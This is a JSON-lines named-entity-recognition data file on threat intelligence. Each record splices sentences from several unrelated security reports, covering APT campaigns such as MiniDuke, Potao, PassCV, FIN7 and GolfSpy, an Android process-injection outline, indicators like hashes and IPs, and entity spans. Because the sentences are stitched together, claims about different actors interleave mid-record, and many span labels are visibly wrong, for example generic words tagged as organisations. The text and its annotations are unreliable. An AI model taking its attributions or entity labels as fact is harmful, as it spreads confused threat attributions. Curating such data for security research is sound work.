{"text": "This is done by reading the /proc/ [ pid ] /cmdline file . Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments . This additional obfuscation puts yet another layer between APT17 and the security professionals attempting to chase them down . \u2022 Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar \u2013 if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": [{"start": 28, "end": 51, "label": "Indicator"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 137, "end": 150, "label": "Organization"}, {"start": 155, "end": 180, "label": "Organization"}, {"start": 183, "end": 196, "label": "Organization"}, {"start": 346, "end": 351, "label": "Organization"}, {"start": 461, "end": 482, "label": "Organization"}, {"start": 554, "end": 561, "label": "Organization"}, {"start": 609, "end": 616, "label": "Malware"}, {"start": 625, "end": 631, "label": "Organization"}]}
{"text": "This very first step fails in Android 7.0 and higher , even with a root permission . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People's Republics . This BLACKCOFFEE variant contains one or more URLs that link to the biography sections of attacker-created profiles as well as forum threads that contain comments from those same profiles . This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": [{"start": 30, "end": 41, "label": "System"}, {"start": 197, "end": 224, "label": "Organization"}, {"start": 292, "end": 303, "label": "Malware"}, {"start": 477, "end": 613, "label": "Malware"}]}
{"text": "The /proc filesystem is now mounted with a hidepid=2 parameter , which means that the process can not access other process /proc/ [ pid ] directory . The attacks appear to be geopolitically motivated and target high profile organizations . A URL is randomly selected and the malware searches at that location for an encoded IP address located between two tags , \u201c @MICR0S0FT \u201d and \u201c C0RP0RATI0N \u201d . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": [{"start": 4, "end": 9, "label": "Indicator"}, {"start": 123, "end": 137, "label": "Indicator"}, {"start": 211, "end": 237, "label": "Organization"}, {"start": 408, "end": 423, "label": "Organization"}, {"start": 436, "end": 438, "label": "System"}, {"start": 453, "end": 509, "label": "Indicator"}, {"start": 514, "end": 571, "label": "Indicator"}]}
{"text": "A ptrace_attach syscall is called . The objective of the attacks is clearly espionage \u2013 they involve gaining access to top legislative , executive and judicial bodies around the world . The malware then communicates directly with the retrieved and decoded IP address to receive commands and send stolen information . Once they are downloaded to the machine , they can fetch a larger backdoor which carries out the cyberespionage activities , through functions such as copy file , move file , remove file , make directory , kill process and of course , download and execute new malware and lateral movement tools .", "spans": [{"start": 410, "end": 439, "label": "Organization"}]}
{"text": "This allows the source process to trace the target . The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine . If the C2 server is discovered or shut down , the threat actors can update the encoded IP address on TechNet to maintain control of the victims \u2019 machines . The final stage backdoor connects to two servers , one in Panama and one in Turkey to receive the instructions from the attackers .", "spans": [{"start": 238, "end": 240, "label": "System"}, {"start": 332, "end": 339, "label": "System"}, {"start": 508, "end": 517, "label": "Organization"}]}
{"text": "The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address . The attacks were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . BLACKCOFFEE supports an initial set of fifteen commands , including creating a reverse shell , uploading and downloading files , and enumerating files and processes . The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : \u2022 By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": [{"start": 222, "end": 231, "label": "Organization"}, {"start": 261, "end": 272, "label": "Malware"}, {"start": 432, "end": 441, "label": "Organization"}, {"start": 442, "end": 558, "label": "Indicator"}, {"start": 590, "end": 609, "label": "System"}, {"start": 612, "end": 662, "label": "Indicator"}]}
{"text": "The source process reads /proc/ [ pid ] /maps to find where libc is located in the target process memory . Like BlackEnergy ( a.k.a Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus . The attackers can also extend BLACKCOFFEE \u2019s functionality through additional commands sent as shellcode . Together with our partner CrySyS Lab , we \u2019ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": [{"start": 25, "end": 45, "label": "Indicator"}, {"start": 112, "end": 123, "label": "System"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 155, "end": 160, "label": "System"}, {"start": 349, "end": 360, "label": "Malware"}, {"start": 452, "end": 462, "label": "Organization"}, {"start": 539, "end": 547, "label": "Malware"}]}
{"text": "By adding the previously calculated offset , it can get the address of the mmap function in the target process memory . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives . APT17 : de56eb5046e518e266e67585afa34612 . These new infection vectors rely on Java and IE vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 156, "end": 161, "label": "System"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 235, "end": 267, "label": "Indicator"}, {"start": 306, "end": 333, "label": "Vulnerability"}, {"start": 344, "end": 360, "label": "Organization"}]}
{"text": "The source process tries to determine the location of dlopen , dlsym , and dlclose functions in the target process . The first Potao campaign that we examined took place in August 2011 . APT17 : 195ade342a6a4ea0a58cfbfb43dc64cb . While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": [{"start": 187, "end": 192, "label": "Organization"}, {"start": 195, "end": 227, "label": "Indicator"}, {"start": 258, "end": 269, "label": "System"}, {"start": 273, "end": 281, "label": "Malware"}, {"start": 284, "end": 426, "label": "Indicator"}]}
{"text": "It uses the same technique as it used to determine the offset to the mmap function . In March 2014 , the gang behind Potao started using a new infection vector . APT17 : 4c21336dad66ebed2f7ee45d41e6cada . The page hxxp://[c2_hostname]/groups / business - principles.html is used as an starting point for the attack .", "spans": [{"start": 117, "end": 122, "label": "System"}, {"start": 143, "end": 159, "label": "System"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 170, "end": 202, "label": "Indicator"}, {"start": 205, "end": 314, "label": "Indicator"}]}
{"text": "The source process writes the native shellcode into the memory region allocated by mmap . Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies . APT17 : 0370002227619c205402c48bde4332f6 . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": [{"start": 109, "end": 113, "label": "Organization"}, {"start": 127, "end": 132, "label": "System"}, {"start": 195, "end": 205, "label": "Organization"}, {"start": 210, "end": 227, "label": "Organization"}, {"start": 259, "end": 272, "label": "Organization"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 283, "end": 315, "label": "Indicator"}, {"start": 318, "end": 406, "label": "Malware"}, {"start": 409, "end": 473, "label": "Indicator"}, {"start": 478, "end": 525, "label": "Malware"}, {"start": 528, "end": 570, "label": "Indicator"}]}
{"text": "Additionally , it also writes addresses of dlopen , dlsym , and dlclose into the same region , so that they can be used by the shellcode . As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 . APT17 : ac169b7d4708c6fa7fee9be5f7576414 . The second webpage , \u201c sidebar.html \u201d contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": [{"start": 237, "end": 241, "label": "Organization"}, {"start": 257, "end": 269, "label": "System"}, {"start": 299, "end": 304, "label": "Organization"}, {"start": 307, "end": 339, "label": "Indicator"}, {"start": 365, "end": 397, "label": "Indicator"}, {"start": 400, "end": 462, "label": "Malware"}]}
{"text": "Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it . In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples . APT17 : 130.184.156.62 . Its code identifies the victim \u2019s browser and then serves one of two exploits .", "spans": [{"start": 99, "end": 105, "label": "Organization"}, {"start": 194, "end": 198, "label": "Organization"}, {"start": 239, "end": 250, "label": "System"}, {"start": 255, "end": 275, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 286, "end": 300, "label": "Indicator"}]}
{"text": "The source process changes the registers in the target process so that PC register points directly to the shellcode . Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated . APT17 : 69.80.72.165 . It also sends collected browser data to another script by sending a POST request to \u201c hxxp://[c2_hostname]/groups / count / write.php \u201d .", "spans": [{"start": 118, "end": 123, "label": "System"}, {"start": 248, "end": 255, "label": "System"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 312, "end": 324, "label": "Indicator"}, {"start": 413, "end": 460, "label": "Indicator"}]}
{"text": "This is done using the ptrace syscall . Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan . APT17 : 110.45.151.43 . The exploits are located in separate web pages .", "spans": [{"start": 60, "end": 65, "label": "System"}, {"start": 373, "end": 378, "label": "Organization"}, {"start": 381, "end": 394, "label": "Indicator"}]}
{"text": "This diagram illustrates the whole process . The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . APT17 : 121.101.73.231 . Clients using Internet Explorer version 8 are served with \u201c about.htm \u201d , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads \u201c JavaApplet.html \u201d .", "spans": [{"start": 49, "end": 61, "label": "Organization"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 211, "end": 225, "label": "Indicator"}, {"start": 242, "end": 269, "label": "System"}, {"start": 270, "end": 441, "label": "Indicator"}]}
{"text": "Summary PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps . The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . APT18 . The web page \u201c JavaApplet.html \u201d loads \u201c JavaApplet.class \u201d that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": [{"start": 110, "end": 122, "label": "Organization"}, {"start": 142, "end": 165, "label": "System"}, {"start": 217, "end": 234, "label": "Malware"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 341, "end": 356, "label": "Indicator"}, {"start": 367, "end": 383, "label": "Indicator"}, {"start": 386, "end": 458, "label": "Malware"}, {"start": 459, "end": 474, "label": "Vulnerability"}]}
{"text": "Zen family PHA authors exhibit a wide range of techniques , from simply inserting an advertising SDK to a sophisticated trojan . he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . Dell SecureWorks Counter Threat Unit ( CTU ) analysts were recently engaged with a client thought to have been compromised by a threat group CTU researchers have named Threat Group-0416 ( TG-0416 ) . The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 164, "end": 187, "label": "System"}, {"start": 239, "end": 256, "label": "Malware"}, {"start": 340, "end": 376, "label": "Organization"}, {"start": 379, "end": 382, "label": "Organization"}, {"start": 481, "end": 484, "label": "Organization"}, {"start": 508, "end": 525, "label": "Organization"}, {"start": 528, "end": 535, "label": "Organization"}, {"start": 540, "end": 622, "label": "Malware"}, {"start": 629, "end": 735, "label": "Malware"}]}
{"text": "The app that resulted in the largest number of affected users was the click fraud version , which was installed over 170,000 times at its peak in February 2018 . PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release . Various artifacts from the initial phases of the incident provided strong indications of the existence of this particular threat group within the client's infrastructure . According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": [{"start": 162, "end": 168, "label": "Organization"}, {"start": 251, "end": 255, "label": "System"}, {"start": 261, "end": 268, "label": "System"}, {"start": 273, "end": 282, "label": "System"}, {"start": 578, "end": 604, "label": "System"}, {"start": 725, "end": 731, "label": "Organization"}, {"start": 770, "end": 783, "label": "Vulnerability"}]}
{"text": "The most affected countries were India , Brazil , and Indonesia . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . It decodes the binary and writes it to a Java temporary directory with name \u201c ntuser.bin \u201d .", "spans": [{"start": 66, "end": 71, "label": "Organization"}, {"start": 90, "end": 104, "label": "System"}, {"start": 165, "end": 168, "label": "System"}, {"start": 176, "end": 183, "label": "System"}, {"start": 186, "end": 193, "label": "Organization"}]}
{"text": "In most cases , these click fraud apps were uninstalled by the users , probably due to the low quality of the apps . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . The threat actors achieved an initial foothold into the infrastructure via phishing email that convinced victims to install the Xyligan remote access Trojan ( RAT ) on a system . Then , it copies the system file \u201c rundll32.exe \u201d to the same directory with name \u201c ntuser.exe \u201d and runs it with \u201c ntuser.bin \u201d as a parameter , effectively loading the malicious DLL file .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 141, "end": 155, "label": "System"}, {"start": 216, "end": 219, "label": "System"}, {"start": 227, "end": 234, "label": "System"}, {"start": 312, "end": 326, "label": "System"}, {"start": 365, "end": 372, "label": "Malware"}, {"start": 387, "end": 393, "label": "Malware"}, {"start": 451, "end": 463, "label": "Indicator"}, {"start": 500, "end": 510, "label": "Indicator"}, {"start": 532, "end": 542, "label": "Indicator"}, {"start": 582, "end": 604, "label": "Malware"}]}
{"text": "If Google Play Protect detects one of these apps , Google Play Protect will show a warning to users . The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV . The threat actors then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . That DLL file is the main module of Miniduke , and it uses the URL http://twitter.com/TamicaCGerald to fetch commands .", "spans": [{"start": 3, "end": 22, "label": "System"}, {"start": 51, "end": 70, "label": "System"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 226, "end": 232, "label": "Organization"}, {"start": 272, "end": 281, "label": "Malware"}, {"start": 308, "end": 315, "label": "System"}, {"start": 452, "end": 484, "label": "Indicator"}]}
{"text": "We are constantly on the lookout for new threats and we are expanding our protections . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform . Using host-based digital forensic analysis , CTU analysts observed the intruders using the native \u2018 at.exe \u2019 Windows task scheduler tool to move laterally within the infrastructure . The web page \u201c about.htm \u201d implements an exploit for Microsoft Internet Explorer 8 .", "spans": [{"start": 122, "end": 129, "label": "Organization"}, {"start": 254, "end": 257, "label": "Organization"}, {"start": 309, "end": 315, "label": "Indicator"}, {"start": 318, "end": 325, "label": "System"}, {"start": 407, "end": 416, "label": "Indicator"}, {"start": 445, "end": 474, "label": "System"}]}
{"text": "Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically and periodically scanned by our solutions . The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . Many threat groups use lateral movement techniques , but this engagement allowed CTU analysts to not only further validate indicators of lateral movement , but also to look a bit closer at those indicators and expand the cluster of indicators surrounding the use of at.exe for lateral movement within the infrastructure . It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": [{"start": 18, "end": 29, "label": "System"}, {"start": 39, "end": 58, "label": "System"}, {"start": 75, "end": 86, "label": "System"}, {"start": 153, "end": 159, "label": "Organization"}, {"start": 239, "end": 253, "label": "Organization"}, {"start": 443, "end": 446, "label": "Organization"}, {"start": 628, "end": 634, "label": "Indicator"}, {"start": 746, "end": 761, "label": "Vulnerability"}]}
{"text": "You can check the status of Google Play Protect on your device : Open your Android device 's Google Play Store app . Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia . Threat actors accessed the source host via the hcdLoader RAT . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor \u2019s code .", "spans": [{"start": 28, "end": 47, "label": "System"}, {"start": 93, "end": 110, "label": "System"}, {"start": 141, "end": 147, "label": "Organization"}, {"start": 304, "end": 313, "label": "Malware"}, {"start": 320, "end": 452, "label": "Indicator"}, {"start": 457, "end": 473, "label": "Organization"}]}
{"text": "Tap Menu > Play Protect . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December . The sole indicator on the source host that at.exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf ) that was created when the tool was executed . The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": [{"start": 55, "end": 83, "label": "Organization"}, {"start": 367, "end": 373, "label": "Indicator"}, {"start": 422, "end": 460, "label": "Indicator"}, {"start": 572, "end": 585, "label": "Vulnerability"}]}
{"text": "Look for information about the status of your device . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Beyond the file system metadata for the Prefetch file ( creation and last modification times ) and the last execution time within the file metadata , CTU analysts did not observe any indicators of value on the source host . [ c2_hostname ] The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": [{"start": 59, "end": 64, "label": "Malware"}, {"start": 88, "end": 118, "label": "Vulnerability"}, {"start": 121, "end": 134, "label": "Vulnerability"}, {"start": 175, "end": 187, "label": "Malware"}, {"start": 254, "end": 262, "label": "System"}, {"start": 364, "end": 367, "label": "Organization"}]}
{"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT . Two files are created for the task at approximately the same time : C:\\Windows\\System32\\Tasks\\At1 and C:\\Windows\\Tasks\\At1.job . The PE file also appeared to be a modification of the Miniduke 's main backdoor module that uses the same Twitter URL as the Java payload .", "spans": [{"start": 61, "end": 119, "label": "Indicator"}, {"start": 120, "end": 184, "label": "Indicator"}, {"start": 197, "end": 246, "label": "Indicator"}, {"start": 247, "end": 311, "label": "Indicator"}, {"start": 312, "end": 318, "label": "System"}, {"start": 459, "end": 465, "label": "System"}, {"start": 570, "end": 594, "label": "Indicator"}, {"start": 651, "end": 683, "label": "Malware"}, {"start": 722, "end": 734, "label": "Malware"}]}
{"text": "Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign \u2018 Bouncing Golf \u2019 Affects Middle East We uncovered a cyberespionage campaign targeting Middle WildFire properly classifies BBSRAT malware samples as malicious . The first file is an Extensible Markup Language ( XML ) file that can be opened and viewed in a text editor . We have discovered and analysed two previously unknown infector vectors that were used in the MiniDuke attacks .", "spans": [{"start": 38, "end": 102, "label": "Indicator"}, {"start": 103, "end": 106, "label": "Malware"}, {"start": 114, "end": 130, "label": "Indicator"}, {"start": 131, "end": 195, "label": "Indicator"}, {"start": 214, "end": 227, "label": "Malware"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 335, "end": 357, "label": "System"}, {"start": 394, "end": 420, "label": "System"}, {"start": 423, "end": 426, "label": "System"}, {"start": 577, "end": 593, "label": "Organization"}]}
{"text": "Eastern countries . This week we will discuss another Chinese nexus adversary we call Samurai Panda . The second file follows a decodable binary format . As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": [{"start": 201, "end": 205, "label": "Organization"}, {"start": 210, "end": 222, "label": "System"}, {"start": 294, "end": 320, "label": "Organization"}]}
{"text": "We named this campaign \u201c Bouncing Golf \u201d based on the malware \u2019 s code in the package named \u201c golf. \u201d June 18 , 2019 We uncovered a cyberespionage campaign targeting Middle Eastern countries . Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims . The operating system also creates a registry key within the software registry hive that is specifically associated with the creation of the scheduled task on the destination host : Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1 . Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": [{"start": 25, "end": 38, "label": "Malware"}, {"start": 193, "end": 206, "label": "Organization"}, {"start": 545, "end": 562, "label": "System"}, {"start": 611, "end": 622, "label": "Organization"}, {"start": 641, "end": 672, "label": "Organization"}, {"start": 696, "end": 723, "label": "Organization"}]}
{"text": "We named this campaign \u201c Bouncing Golf \u201d based on the malware \u2019 s code in the package named \u201c golf. \u201d The malware involved , which Trend Micro detects as AndroidOS_GolfSpy.HRX , is notable for its wide range of cyberespionage capabilities . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . The Task Scheduler service names the tasks , so subsequent tasks are named At2 , At3 , and so on . The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": [{"start": 25, "end": 38, "label": "Malware"}, {"start": 131, "end": 142, "label": "Organization"}, {"start": 154, "end": 175, "label": "Malware"}, {"start": 307, "end": 318, "label": "Organization"}, {"start": 587, "end": 594, "label": "Malware"}, {"start": 624, "end": 673, "label": "Malware"}]}
{"text": "Malicious codes are embedded in apps that the operators repackaged from legitimate applications . Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . FIN7.5 : the infamous cybercrime rig FIN7 continues its activities . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": [{"start": 306, "end": 312, "label": "Organization"}, {"start": 343, "end": 347, "label": "Organization"}, {"start": 572, "end": 590, "label": "Organization"}, {"start": 591, "end": 604, "label": "Organization"}]}
{"text": "Monitoring the command and control ( C & C ) servers used by Bouncing Golf , we \u2019 ve so far observed more than 660 Android devices infected with GolfSpy . Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes . On August 1, 2018 , the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig . The attackers work from computers with Chinese and Korean language configurations .", "spans": [{"start": 61, "end": 74, "label": "Malware"}, {"start": 115, "end": 122, "label": "System"}, {"start": 145, "end": 152, "label": "Malware"}, {"start": 336, "end": 357, "label": "Organization"}, {"start": 441, "end": 445, "label": "Organization"}, {"start": 467, "end": 476, "label": "Organization"}, {"start": 487, "end": 544, "label": "System"}]}
{"text": "Much of the information being stolen appear to be military-related . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . They used their unauthorized access to obtain digital certificates that were later exploited in malware campaigns targeting other industries and political activists .", "spans": [{"start": 244, "end": 248, "label": "Organization"}, {"start": 470, "end": 487, "label": "Organization"}, {"start": 504, "end": 514, "label": "Organization"}, {"start": 519, "end": 538, "label": "Organization"}]}
{"text": "The campaign \u2019 s attack vector is also interesting . When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from . Interestingly , this threat actor created fake companies in order to hire remote pentesters , developers and interpreters to participate in their malicious business . So far , there 's no evidence that customers of the infected game companies were targeted , although in at least one case , malicious code was accidentally installed on gamers ' computers by one of the infected victim companies .", "spans": [{"start": 170, "end": 192, "label": "Organization"}, {"start": 517, "end": 557, "label": "Organization"}, {"start": 606, "end": 620, "label": "Malware"}, {"start": 651, "end": 669, "label": "Organization"}, {"start": 680, "end": 709, "label": "Organization"}]}
{"text": "These repackaged , malware-laden apps are neither on Google Play nor popular third-party app marketplaces , and we only saw the website hosting the malicious apps being promoted on social media when we followed GolfSpy \u2019 s trail . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module . The main goal behind its malicious activities was to steal financial assets from companies , such as debit cards , or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . \"", "spans": [{"start": 53, "end": 64, "label": "System"}, {"start": 211, "end": 218, "label": "Malware"}, {"start": 264, "end": 273, "label": "System"}, {"start": 283, "end": 309, "label": "System"}, {"start": 640, "end": 649, "label": "Organization"}, {"start": 709, "end": 720, "label": "Malware"}, {"start": 743, "end": 749, "label": "Malware"}]}
{"text": "We were also able to analyze some GolfSpy samples sourced from the Trend Micro mobile app reputation service . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . In 2018-2019 , researchers of Kaspersky Lab \u2019s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures ( TTPs ) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . \" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": [{"start": 34, "end": 41, "label": "Malware"}, {"start": 67, "end": 78, "label": "Organization"}, {"start": 132, "end": 142, "label": "Organization"}, {"start": 172, "end": 207, "label": "Vulnerability"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 286, "end": 319, "label": "Organization"}, {"start": 420, "end": 424, "label": "Organization"}, {"start": 550, "end": 566, "label": "Organization"}, {"start": 600, "end": 609, "label": "Organization"}]}
{"text": "Also of note is Bouncing Golf \u2019 s possible connection to a previously reported mobile cyberespionage campaign that researchers named Domestic Kitten . Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . \" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": [{"start": 16, "end": 29, "label": "Malware"}, {"start": 133, "end": 148, "label": "Malware"}, {"start": 151, "end": 161, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 389, "end": 393, "label": "Organization"}, {"start": 540, "end": 554, "label": "Malware"}]}
{"text": "The strings of code , for one , are similarly structured . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": [{"start": 59, "end": 68, "label": "Organization"}, {"start": 203, "end": 207, "label": "Organization"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 360, "end": 373, "label": "Organization"}, {"start": 378, "end": 394, "label": "Malware"}]}
{"text": "The data targeted for theft also have similar formats . ScarCruft has several ongoing operations , utilizing multiple exploits \u2014 two for Adobe Flash and one for Microsoft Internet Explorer . Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target . But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . \"", "spans": [{"start": 56, "end": 65, "label": "Organization"}, {"start": 137, "end": 148, "label": "System"}, {"start": 161, "end": 188, "label": "System"}, {"start": 191, "end": 204, "label": "Organization"}, {"start": 262, "end": 266, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}]}
{"text": "Figure 1 . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The spear phishing campaigns were remarkably sophisticated from a social engineering perspective . Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": [{"start": 11, "end": 20, "label": "Organization"}, {"start": 250, "end": 270, "label": "System"}, {"start": 345, "end": 373, "label": "Organization"}]}
{"text": "GolfSpy \u2019 s infection chain GolfSpy 's Potential Impact Given GolfSpy \u2019 s information-stealing capabilities , this malware can effectively hijack an infected Android device . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . In various cases , the operators exchanged numerous messages with their victims for weeks before sending their malicious documents . The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 28, "end": 35, "label": "Malware"}, {"start": 62, "end": 69, "label": "Malware"}, {"start": 158, "end": 165, "label": "System"}, {"start": 286, "end": 291, "label": "Vulnerability"}, {"start": 294, "end": 320, "label": "Vulnerability"}, {"start": 456, "end": 486, "label": "System"}, {"start": 554, "end": 572, "label": "Organization"}]}
